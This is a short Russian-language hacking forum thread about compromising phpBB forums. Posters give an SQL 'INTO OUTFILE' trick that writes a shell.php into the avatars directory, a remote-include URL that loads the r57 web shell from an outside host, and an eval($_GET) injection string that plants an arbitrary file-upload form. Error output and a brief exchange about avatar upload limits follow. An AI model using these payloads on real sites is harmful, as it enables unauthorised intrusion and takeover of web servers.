А чем это не нравится? Просто создаёш файл 1.sql с содержимым ниже и импортируеш:


А потом просто инклудиш: www.test2.ru/phpbb/images/avatars/shell.php?inc=http://inferno23x.jino-net.ru/shells/r57shell.txt

Error importing backup file

DEBUG MODE

SQL Error : 1045 Access denied for user 'user'@'localhost' (using password: YES)

SELECT cat_title INTO OUTFILE '/путь до папки forum/images/avatars/shell.php' FROM phpbb_categories where cat_id=99999

Line : 980
File : /путь до папки forum/admin/admin_db_utilities.php

ну инклуде http не всегда работает в силу нескоьких причин , поэтому чтобы проверить что происходит ли вобще php injection тестим на phpinfo() например, а вобще можно и без include обойтись, например с помощью eval($_GET[q]):

http://forum.com/profile.php?q=print($_GET[t]);if(isset($_POST[go_up])){if(is_uploaded_file($_FILES[userfile][tmp_name])){@co py($_FILES[userfile][tmp_name],$_FILES[userfile][name]);}};exit;&t=<form enctype=multipart/form-data method=post><input name=userfile type=file><input type=submit name=go_up></form>

мм а с аватарой проблему не решить путем увеличения лимита загружаемого файла? или о_0 это в админке не редактируется?

мм хотя мб там фильтрация стоит, но все же проверь..

http://forum.antichat.ru/thread32782.html

Файл аватары должен быть .jpg, .gif или .png